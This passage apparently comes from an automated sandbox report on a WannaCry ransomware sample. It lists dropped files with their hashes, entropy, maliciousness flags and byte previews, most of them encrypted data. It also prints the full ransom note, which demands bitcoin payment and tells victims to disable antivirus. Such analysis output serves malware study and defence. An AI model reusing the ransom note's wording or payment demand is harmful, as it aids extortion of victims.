                                                                                      Entropy (8bit):7.839306166895415
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk6g+eV5VZV7NXmPDabZivkc4yrNlQzFfGlSCrngnlC22Zp+OSz/WO:bkR+yVZ9NXmPD0AUyNlkFfG7Msj+tz/x
                                                                                      MD5:9A56DE546DFACAEB585107806F84CC29
                                                                                      SHA1:9AC556B36036ED81E6010688FD88C1617D605BF6
                                                                                      SHA-256:6A1B1785F78D1D0D99400172D41310DD9B2069310C64E8B7D95F1A5EF1784846
                                                                                      SHA-512:0AEB5FB3BB0F17BD6C629A52B774112A3EAA95F39AC421D3CDAD7D56BB4A943AE83F21B3679A9D5D287F87873EAC25D556C66740A08AE43103D2FFD5EC42BFAC
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....w.an..B.:~..M.'.(...|1.....Nvk..])....X.G>...J2.>.IY].LG.Rs.J^.z...Fn7....']...e..mc..}L......$..V... .R.K.MC..:.t8F7..fZ\Wk..C......../.]...Wp..D.JY.fi..T.E..\.^vh../..v...[:..7..4.lT.l..g..n.........L..ps6f.....A......R.r.Gq..wJ...`xH.TC...@..I................cHx....Ta.g9,..~.r;..%../....^.G...W].....[V.b.o.P...S<.B...F..7(.A...NV..Q..U.;.....w.A...O.;....4......F.J`..0.....H8. Yr....W`Ie..d..~.(zI.z.Eh.@s..a.Q^!.h..^.>.6..a:8O..5"....$.H..sd ..j..........N-v...^......!..b$..d.'/,\.CX;.?dc....+|t\..1.`...&...P.#.y...KBM..~.9.{<Ec....-.$K{l:v..M...'..?.3C'U..m-...Z6..\~....JoS....D.:....+-6...D..+55f.Kz.|.0..5.lS..G.|....,.p..D._.g.<5....#..4.G..B1Z.,Px3"..n......5o.j...'mW..Q.....t...|. ..y....G...k....^').U....5....%Ln..w5....:....[.....R.d..q[..${..W.-.c.l.d-:.]?D..qy.J...h...[.di:qF.`.....ldZ.$i.p...N..P_.B..%.(5......D...T....h.d93$|..?\`y..G,h.....d...>..{$.S..r..P(......q...x..^s.Q.-J...t^...`...QM..|.{*I..KE./9....3f
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.839306166895415
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk6g+eV5VZV7NXmPDabZivkc4yrNlQzFfGlSCrngnlC22Zp+OSz/WO:bkR+yVZ9NXmPD0AUyNlkFfG7Msj+tz/x
                                                                                      MD5:9A56DE546DFACAEB585107806F84CC29
                                                                                      SHA1:9AC556B36036ED81E6010688FD88C1617D605BF6
                                                                                      SHA-256:6A1B1785F78D1D0D99400172D41310DD9B2069310C64E8B7D95F1A5EF1784846
                                                                                      SHA-512:0AEB5FB3BB0F17BD6C629A52B774112A3EAA95F39AC421D3CDAD7D56BB4A943AE83F21B3679A9D5D287F87873EAC25D556C66740A08AE43103D2FFD5EC42BFAC
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....w.an..B.:~..M.'.(...|1.....Nvk..])....X.G>...J2.>.IY].LG.Rs.J^.z...Fn7....']...e..mc..}L......$..V... .R.K.MC..:.t8F7..fZ\Wk..C......../.]...Wp..D.JY.fi..T.E..\.^vh../..v...[:..7..4.lT.l..g..n.........L..ps6f.....A......R.r.Gq..wJ...`xH.TC...@..I................cHx....Ta.g9,..~.r;..%../....^.G...W].....[V.b.o.P...S<.B...F..7(.A...NV..Q..U.;.....w.A...O.;....4......F.J`..0.....H8. Yr....W`Ie..d..~.(zI.z.Eh.@s..a.Q^!.h..^.>.6..a:8O..5"....$.H..sd ..j..........N-v...^......!..b$..d.'/,\.CX;.?dc....+|t\..1.`...&...P.#.y...KBM..~.9.{<Ec....-.$K{l:v..M...'..?.3C'U..m-...Z6..\~....JoS....D.:....+-6...D..+55f.Kz.|.0..5.lS..G.|....,.p..D._.g.<5....#..4.G..B1Z.,Px3"..n......5o.j...'mW..Q.....t...|. ..y....G...k....^').U....5....%Ln..w5....:....[.....R.d..q[..${..W.-.c.l.d-:.]?D..qy.J...h...[.di:qF.`.....ldZ.$i.p...N..P_.B..%.(5......D...T....h.d93$|..?\`y..G,h.....d...>..{$.S..r..P(......q...x..^s.Q.-J...t^...`...QM..|.{*I..KE./9....3f
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):933
                                                                                      Entropy (8bit):4.711824502619554
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
                                                                                      MD5:7A2726BB6E6A79FB1D092B7F2B688AF0
                                                                                      SHA1:B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
                                                                                      SHA-256:840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
                                                                                      SHA-512:4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Mar 23 13:47:49 2024, mtime=Sat Mar 23 13:47:49 2024, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                                                      Category:dropped
                                                                                      Size (bytes):1189
                                                                                      Entropy (8bit):5.040493253287504
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:88qLHOLm86eCRBlgK21Z5bpEO9l7vQAPic3qygm:882HOLm8iRyv17vPQyg
                                                                                      MD5:702D04031DD9BF002906D9511CD8FA24
                                                                                      SHA1:332DBCC83F66AEE905A99AE92416F189CFCF545F
                                                                                      SHA-256:704A9F74AA11DF406AF01B1B417E5BEC073220739AA562F76DC18804C04F7BD4
                                                                                      SHA-512:6D246DCDDF79E7EC911A80C6F8DA38B292A79946B01C1E4BCED43347649018A7BCFD29812D8DC6DE61672F013246F571C1F7C07C7309E20DD3A13154788FEB8A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:L..................F.... ....{Q.1}...'g.1}...X.H............................X.:..DG..Yr?.D..U..k0.&...&.........{4.....S.0}....q.1}......t...CFSF..1.....FW.H..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......FW.HwX.u..............................A.p.p.D.a.t.a...B.P.1.....wX.u..Local.<......FW.HwX.u...........................M..L.o.c.a.l.....N.1.....wX.u..Temp..:......FW.HwX.u..........................O...T.e.m.p.......1.....wX.u..TEMP1_~1.ZIP..l......wX.uwX.u....c.....................?.o.T.e.m.p.1._.R.a.n.s.o.m.w.a.r.e...W.a.n.n.a.C.r.y...z.i.p.....t.2......J.. .@WANAD~1.EXE..X......wX.uwX.u.....Y........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......................-...........................C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.........|....I.J.H..K..:...`.......X.......134349...........hT..CrF.f4... .P.............%..hT..CrF.f4... .P.............%.............1SPS.XF.L8C.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):271360
                                                                                      Entropy (8bit):7.99923285382296
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:JCPCp9ktJyz4UtNe0u664n4imdvjyGCUMn4cqRVEzo:vpwJyzh7nUvjyGCUMla5
                                                                                      MD5:4F0FC4096CE7C4BB31499CA8B304DDEE
                                                                                      SHA1:5F176A1B7F593736F6616DE55277E38658F86A11
                                                                                      SHA-256:800636D080D6809513EF2FA160FC673218ED6EF8FEFADFFC108B77B3DC69C149
                                                                                      SHA-512:E9AAA38455A12FAC0C516AA9F4DC4BD835A8319547B7B52CA5A80F026688CD720DFFED4CD443E2DD43A77D4E9F77D5016DB6CD6F9060D76741BE8969F874ACA1
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:../A..6s.K...~~%.E+=.HF.r...dlmVs........c..n...6..........7.u.5..%.d..?..?.!....z"2..Lf4~+....a.(..M......."*x.g.{..jy:.4...]>..+q.y..q&#.p.@..#..>..52cSX.MK....x...3.$.......:h..k..........LP..[F..E....s.....dr....9.G.0.|.A..b(...g...{y......1......r....x..(....U..Q.p;.fP.)m.V..X`{...... .b.nL..........IH.HG1)...-/.~.....!.!q..J.....G.u.v*R.#..A...m*G{........r...............<...g.).(.q.7..1B0|.0.h..=n..J...C..h.l..sldF1s...n+.\.m..bB.E...9./i...........9.@..(#..<.6....'..%...._.V..(jC..q-..r..z.N.<K.l..T.......V..$7.?...r.?c...O....1......,-.vU:..Q@.....|......i..A..n)./[...a...H.w..f..t8Z..6A...D^..yn...x.e.a..6.;8c@..K...0.NR@"T..}...#.y.LSj)..||...c.b.w\S.....<2x...._.z.3..l./...G.sK./2.L.+.w.4F...Te..}.C..K.....H...c.m."C?......a.CAM...".z...WhMN.N....9..+..Dg.R.m.."....E(x..-...-...y...g..q..kg......).W7..s..@..g.....W..#9...Q...!h.m.l^.+......m=..8.+o,8/...UV.u.....dk.gi.B:....)..hT.,.2@y.B......=l.?..<..5.T.....q+3..M...P.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):271640
                                                                                      Entropy (8bit):7.999361092356437
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:pvqeklxoBlXcfzwC+Yu8fwDE32ZN4pogJi9NtC20F3:pvfTDSR+Yu63GZNr6ipQF3
                                                                                      MD5:6FB62EF7E874FBDF3DE9EF0F60F1D9B7
                                                                                      SHA1:5939C0CB6C49644E614AA76FD956935DD1A90AAD
                                                                                      SHA-256:135145E1AE3E9779F185DD047CA133C691E1CA8FF31C0968EBF3C718B03220B6
                                                                                      SHA-512:6A6540F367171B0C5668DED724B26806DE80C8FC833D134B3ACD3E33E0A594C02A2784DCE0C93593D2C19F0E5297754428A683E0B025867A37E9CDF1E8E3CA3F
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......8).......<.e...SQ..Exb........7x.....'.....=...K.......&....g1x.E.4(..AK.9hLq..-0.+......q-'....;..rcu...&........C_.p...^Hq.)..nk_...<"a*.....^x.t.Zf....I...Y......R.....{3...W....vH....>.1.>J.0_.>rs..;q.Ds.6"....5.7wP.%}.J.aN.....^.R.<..(.....$......Q}C.r...M.eHC2{..&..D{........}?....'..N....J..wN....'./...Z...sU.iSn;|.V..d..X.s.(.D4....p..(....$C|.4.\..1o;....A.h....-.3.b.F....o.p5..^.`..gD...l~.q.p..`....E.~..]}y.G....ChPN.-..5/.0...b..0.:._<....Q<....r.7..kE.r(E.~..K.x..5=..3.2|..x...Jb.C..>..........hh.L....O.o..\..6$..^.B....gVL...+...G.N....1<.%.^k-muIu_...qR...`...B...e.M-B..@.FR...<z|,....y.u.....,r9i.X.*...N...7.......:.6q...=....a.....'..W..o......V..R@ ....h<.L....v..3hV.`!..2...._.>...Gsf..#..XS.-Swc.1.B.|.}.;..=..=C...4..K..C.8.......f.(B..H.'P.B..#H.O.J2.0. i......W.|..s...Zc..e....*9..VTKw.W....T.._B.wP..Q..9..)[~.R.o.b..m...............s.x.h%.B...-.>...hG<.'8..H...=...E.79....3..!..g6..q...Yv....q...N..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):271640
                                                                                      Entropy (8bit):7.999361092356437
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:pvqeklxoBlXcfzwC+Yu8fwDE32ZN4pogJi9NtC20F3:pvfTDSR+Yu63GZNr6ipQF3
                                                                                      MD5:6FB62EF7E874FBDF3DE9EF0F60F1D9B7
                                                                                      SHA1:5939C0CB6C49644E614AA76FD956935DD1A90AAD
                                                                                      SHA-256:135145E1AE3E9779F185DD047CA133C691E1CA8FF31C0968EBF3C718B03220B6
                                                                                      SHA-512:6A6540F367171B0C5668DED724B26806DE80C8FC833D134B3ACD3E33E0A594C02A2784DCE0C93593D2C19F0E5297754428A683E0B025867A37E9CDF1E8E3CA3F
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......8).......<.e...SQ..Exb........7x.....'.....=...K.......&....g1x.E.4(..AK.9hLq..-0.+......q-'....;..rcu...&........C_.p...^Hq.)..nk_...<"a*.....^x.t.Zf....I...Y......R.....{3...W....vH....>.1.>J.0_.>rs..;q.Ds.6"....5.7wP.%}.J.aN.....^.R.<..(.....$......Q}C.r...M.eHC2{..&..D{........}?....'..N....J..wN....'./...Z...sU.iSn;|.V..d..X.s.(.D4....p..(....$C|.4.\..1o;....A.h....-.3.b.F....o.p5..^.`..gD...l~.q.p..`....E.~..]}y.G....ChPN.-..5/.0...b..0.:._<....Q<....r.7..kE.r(E.~..K.x..5=..3.2|..x...Jb.C..>..........hh.L....O.o..\..6$..^.B....gVL...+...G.N....1<.%.^k-muIu_...qR...`...B...e.M-B..@.FR...<z|,....y.u.....,r9i.X.*...N...7.......:.6q...=....a.....'..W..o......V..R@ ....h<.L....v..3hV.`!..2...._.>...Gsf..#..XS.-Swc.1.B.|.}.;..=..=C...4..K..C.8.......f.(B..H.'P.B..#H.O.J2.0. i......W.|..s...Zc..e....*9..VTKw.W....T.._B.wP..Q..9..)[~.R.o.b..m...............s.x.h%.B...-.>...hG<.'8..H...=...E.79....3..!..g6..q...Yv....q...N..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.809562261712615
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:VS0zU5/Io56E9HOwLCFrffdA/G3DBhziqQ:Vb06sHR0d/XziqQ
                                                                                      MD5:339E86D140FD3A0BB2FB0277B8BE24D6
                                                                                      SHA1:387AFCF2C5D688832667E9CF7B8CE9364C05BA21
                                                                                      SHA-256:95F51DAB7A47F429B70685BEFE7C488E276A2E94EB3D9E85A6DD0990C847DC5A
                                                                                      SHA-512:A4FCCC46D152D38B687E15F07C6E9DA4AD9D42D16FDD6C407BFB3A6F9757A4460A319E4EE8D16AA2B446B096F0F4298DCBF7695D463E424D06A11678332B30DE
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:N..|o....X............:T............s %8.....,.6.e...^.Id})........G.g.]...0i.}z9{.1ytB....T.(...n.....4....Q...(69.=\.e..#=.......f|c@M..^7.kv..c.Z..4...`._<..F4.s...A.,.v..5...f<...N...%..1.~..d...Z....?.O.:..x.DO.._.U7=.9..._..D.13.1*..c..6.J.d....#...4.=7^.W/Q...`......(.>\....T....2..T.V.|..../..gT..*.I'i.....&.?..v......m..p...`%..Jv..6A...V9..Yp=...k.u..{.a`...5.|...3.7....pO.........NF.C;..9..%3... ...:.....O.......S...s.l......q...e.0D.:....W..:..P.`..cc.{..+.a.v.F..:..i..0 .7$..Q.Sr....d>..8.u.......rvg14\..4.d...8.....)S....*bT.D!m",..Y3I..........8.../...{.....b.e.Q....+..Y..p.;N..L...Y.......lb....V....0..M.}.=...j.q=....r%..Wl......-)...o..{i../.9.Y.*)..g.}y.I.Z...)....;U..L.M"J....^...Gu....#p.".rP...~.....|#...B....S.Q....2........q..r.|..Bf.(W....>...::.=..O.^.|....vG.$......^..(M7E..................~.5..*...`....xVw#.FL...'B..4.W..../l.....f.....}.....q...........5.......z.f8.4.|...l..1,t66.[j...q.~....%......;%S
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.834461078037435
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk2ssPaRH3VDRGem0GRm2bQTh/ytvXlBhYx8QIAnScgRHzEFbyQifNs:bkrsPatGemv3bQTEvX7hYxg1wbyQia
                                                                                      MD5:767C018E9174C8D7E5C7E0F76486427A
                                                                                      SHA1:11909DCDD2112AB99AAECDB479FE8AD608E2FBF2
                                                                                      SHA-256:E95F8E407E67FDCD1C24F134E5F38A385CD8347656CB2F28DDD8D44D29BC89CD
                                                                                      SHA-512:55EDEF09553BC9763B79F2FC41B6E44347C88FC719343538B10D731A02FB7EC86F43902864AC0D62E8246F81D96DCABB24D81F15C5DF38EDCC56E00175AB144E
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....-...(.q.O..5........V..y.....%1...Jj..0.K.c...[..\L.......;N...L...R.....2.m...`...E.?...m..|..P.6...`.?cM.. .#-x..\."...w]..t...B.QN.P.....5......5<......@8jl.y.z.T8....;.hE -..6...T...z.....".....\........].u....:.u.P^(r.9@Jjd..k `"................]..24d.....E.7.@.y..%.`<..m....H).tqs....f@..g,j>.K.....Hj.1.,!...`.o.'.......<.s...........Q...B.X...S..=..b.S...A`SJ......`),....@..q.....Q.d(.U.;.p...1a...L.... .~.c...{j.9T2.....D.t+o..B1......&...B...E..[WD.$/...N.....c3.L....B....'...1.)...L....?.x.,.....o.....h..&...Zy..0.69.......g~R/-[fU.......I..,.....V.....l;.....b.N..R..#dRg........D!.wwi.d .kc.."K...fy....i...Q.(a..>.qY..8.W. .R...td..5...1..(J...d..c..K*;..pz..w~................E...\....8......msEc?.....c&.......[...L.H`N+..K.....Pf...1.....t.6.....i1..........Uk'.....]g.....-rA...IM.f3.@.U....`.|.....6a.:..#b...=..+V.4..d..aZl..:wp?.n.~.U.....S....N..A..4..)y.!t.O.P .`...-.e.G...JO.,%.l....Y/..@.......,...gr.(c...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.834461078037435
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk2ssPaRH3VDRGem0GRm2bQTh/ytvXlBhYx8QIAnScgRHzEFbyQifNs:bkrsPatGemv3bQTEvX7hYxg1wbyQia
                                                                                      MD5:767C018E9174C8D7E5C7E0F76486427A
                                                                                      SHA1:11909DCDD2112AB99AAECDB479FE8AD608E2FBF2
                                                                                      SHA-256:E95F8E407E67FDCD1C24F134E5F38A385CD8347656CB2F28DDD8D44D29BC89CD
                                                                                      SHA-512:55EDEF09553BC9763B79F2FC41B6E44347C88FC719343538B10D731A02FB7EC86F43902864AC0D62E8246F81D96DCABB24D81F15C5DF38EDCC56E00175AB144E
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....-...(.q.O..5........V..y.....%1...Jj..0.K.c...[..\L.......;N...L...R.....2.m...`...E.?...m..|..P.6...`.?cM.. .#-x..\."...w]..t...B.QN.P.....5......5<......@8jl.y.z.T8....;.hE -..6...T...z.....".....\........].u....:.u.P^(r.9@Jjd..k `"................]..24d.....E.7.@.y..%.`<..m....H).tqs....f@..g,j>.K.....Hj.1.,!...`.o.'.......<.s...........Q...B.X...S..=..b.S...A`SJ......`),....@..q.....Q.d(.U.;.p...1a...L.... .~.c...{j.9T2.....D.t+o..B1......&...B...E..[WD.$/...N.....c3.L....B....'...1.)...L....?.x.,.....o.....h..&...Zy..0.69.......g~R/-[fU.......I..,.....V.....l;.....b.N..R..#dRg........D!.wwi.d .kc.."K...fy....i...Q.(a..>.qY..8.W. .R...td..5...1..(J...d..c..K*;..pz..w~................E...\....8......msEc?.....c&.......[...L.H`N+..K.....Pf...1.....t.6.....i1..........Uk'.....]g.....-rA...IM.f3.@.U....`.|.....6a.:..#b...=..+V.4..d..aZl..:wp?.n.~.U.....S....N..A..4..)y.!t.O.P .`...-.e.G...JO.,%.l....Y/..@.......,...gr.(c...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.848932606698107
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:mf9OqfFMtdMikmdUOcAMqlIrCSiEgTfdkktDRn0LPfIJ:uOqfFMpdhjdkCSX6dkkt1k2
                                                                                      MD5:AB5F33E0BDF8CA86E9175EB8E04D9613
                                                                                      SHA1:F112ACF8E38A11A7983BC39B50E266AEA97FEE7E
                                                                                      SHA-256:CC5917DCDE866E510BD4A5753924F677D5A0371DC15B99C831AED8C98AEB9E2F
                                                                                      SHA-512:4D6788AFDCEBDDEC039C4F3DB9261983A40F2D769BF4390BA42CC3E05E7558716ED4E46B86A6573D5988C13F47D5273AA5615024FB0702FE8D80E04C8DCA3C1F
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..(f..?:.u...v')..._..$^.*.H...U..2.L[dw...x..0..ZX..S..WK.rc.".z.{W..UHMr.JT.......VJ......;..]h...N.o..)\.....5....R..G....7.....r!&.i..~L...0~GI...)7...[.....WAZ!m>..g.#$.SQU...c6.eJ`k..........`.W6.?....6(..OQ.|j.xj..B..ZX.Yf......Q..2vh.H..c..Mx..lP.......gy...:.h:.F.E...|v.r,..."...O.m#.Z....W..2.I...6.r..H]-\/..gW.!.k..1.Ra...a..0J..6f.Z...@pV.'.C?.exFX...2M..D0]c...5hfC...._4...t......x.lq...s...;vN...g..I.ok.[..&....S........Q.l+.5JRc..[._.A.0^4.1.P.`.......SX..T.E....+...h8,.S....=...a ........g...Q.aH..S6O.p.|,...v.....I../..Y./..L_mSwv..:D#...?.1J,.z....Z...Pm.)...].v.~kTj..5*@..%?.7<.v..AP..hi.3....!.#..@.B..P.`<!a.i.~Q.:4P.6T....?..lS.x..,G......o/P.[bq....4IA.......t..8.].,z7...YPe..#....8xg#3m.....q.'.....@9..N'..V.......W1..b.D..L.,.wY.=OW...x!...'z.-.....W..J<..|..~.R.B...n..( .M\.T....JN9S...2Qd..x/.b.v.M.........O...q....:...a}!H....".."gn.....d....x...l./.s..8b.bTX.."h&...(...._.m`.BJ...o.W.\..Z.@.+.$m.0..0.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.841334965634559
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bky5+FCaRqA0F4aaTBvfC4OweWGy6aTNP2W7PC8ypWXzA4YL666ul9PRxULyF:bky8ovSxtCtTWGyHT0eK9/rpBRWu
                                                                                      MD5:1DEB06014DD12B06A40C8D1D6DB1A01F
                                                                                      SHA1:8D804261F60BB7E7D98BAF55F05881DEEA4ADAEE
                                                                                      SHA-256:A59C949DCEA060FD497D4A1DC1B27D83DA56F7A816766451B09F0829057BCD80
                                                                                      SHA-512:ECCE6A59D5A854E928A8CBBE3C77CE8FD92D3BAEF63BC170B8FA49E949F1830017AFF3DF506393BF2CB7D2E030690A9A91D39EE4E2C5988657BD603C411A7000
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....V.}m....[.}.c..W...i......<.RC..4,...Z....i^..C........w#M.r..W1.D..4.{...g..........P..6....P......x...V3....#p4..72..x{...a..h.R.. .@..#......F..@.I......r-.l..n...V,....~..(..........R.....Y....;..Q..t./Q].~b.E=...I.n0.8X..yZ.I.L.b...>.1.............w.,.^U.#...B.S.K.R...s.f....i...}Fky.@..........o..4..^.c@..C.f[.,b+.....L+.....-J.h.:.:...w...u==.;...".3..x8...9....l.+.].......9..H.X..bcW.....P#.....V..Q.M744...w~...GLL.......vu,..x......E...hP3.-...k.K.......4...DpZFkUJF.d>......'..L...Q'N.9.....`.......h.r:.........\.;..g..f%....I...0.....u.x....>..L...o...J.|nZ.}...C.....^P.?,...M..]..\.0>._.>.qq$.sj..9...QQ,...[.".wl..&nF2.F..:..`..!...RGY<L../t.1.$N..3.s..!7.;..&.CFVHJG....P.A.([...G.2)..m.b.....Ic+..!....R............."m...w..=.h.G.....mN.l.R...;[.cl....h.j.,R~..y.v.;......j...Clvz!K".yYC..1.Q.h...K.[.U.,?.BQ.........d. [w.(Q...}..;...@.R...K!....wi.l."...........#'.d...=.B2...9'.(....M.tG..D.]1`U..z...zI.K..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.841334965634559
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bky5+FCaRqA0F4aaTBvfC4OweWGy6aTNP2W7PC8ypWXzA4YL666ul9PRxULyF:bky8ovSxtCtTWGyHT0eK9/rpBRWu
                                                                                      MD5:1DEB06014DD12B06A40C8D1D6DB1A01F
                                                                                      SHA1:8D804261F60BB7E7D98BAF55F05881DEEA4ADAEE
                                                                                      SHA-256:A59C949DCEA060FD497D4A1DC1B27D83DA56F7A816766451B09F0829057BCD80
                                                                                      SHA-512:ECCE6A59D5A854E928A8CBBE3C77CE8FD92D3BAEF63BC170B8FA49E949F1830017AFF3DF506393BF2CB7D2E030690A9A91D39EE4E2C5988657BD603C411A7000
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....V.}m....[.}.c..W...i......<.RC..4,...Z....i^..C........w#M.r..W1.D..4.{...g..........P..6....P......x...V3....#p4..72..x{...a..h.R.. .@..#......F..@.I......r-.l..n...V,....~..(..........R.....Y....;..Q..t./Q].~b.E=...I.n0.8X..yZ.I.L.b...>.1.............w.,.^U.#...B.S.K.R...s.f....i...}Fky.@..........o..4..^.c@..C.f[.,b+.....L+.....-J.h.:.:...w...u==.;...".3..x8...9....l.+.].......9..H.X..bcW.....P#.....V..Q.M744...w~...GLL.......vu,..x......E...hP3.-...k.K.......4...DpZFkUJF.d>......'..L...Q'N.9.....`.......h.r:.........\.;..g..f%....I...0.....u.x....>..L...o...J.|nZ.}...C.....^P.?,...M..]..\.0>._.>.qq$.sj..9...QQ,...[.".wl..&nF2.F..:..`..!...RGY<L../t.1.$N..3.s..!7.;..&.CFVHJG....P.A.([...G.2)..m.b.....Ic+..!....R............."m...w..=.h.G.....mN.l.R...;[.cl....h.j.,R~..y.v.;......j...Clvz!K".yYC..1.Q.h...K.[.U.,?.BQ.........d. [w.(Q...}..;...@.R...K!....wi.l."...........#'.d...=.B2...9'.(....M.tG..D.]1`U..z...zI.K..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):933
                                                                                      Entropy (8bit):4.711824502619554
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
                                                                                      MD5:7A2726BB6E6A79FB1D092B7F2B688AF0
                                                                                      SHA1:B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
                                                                                      SHA-256:840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
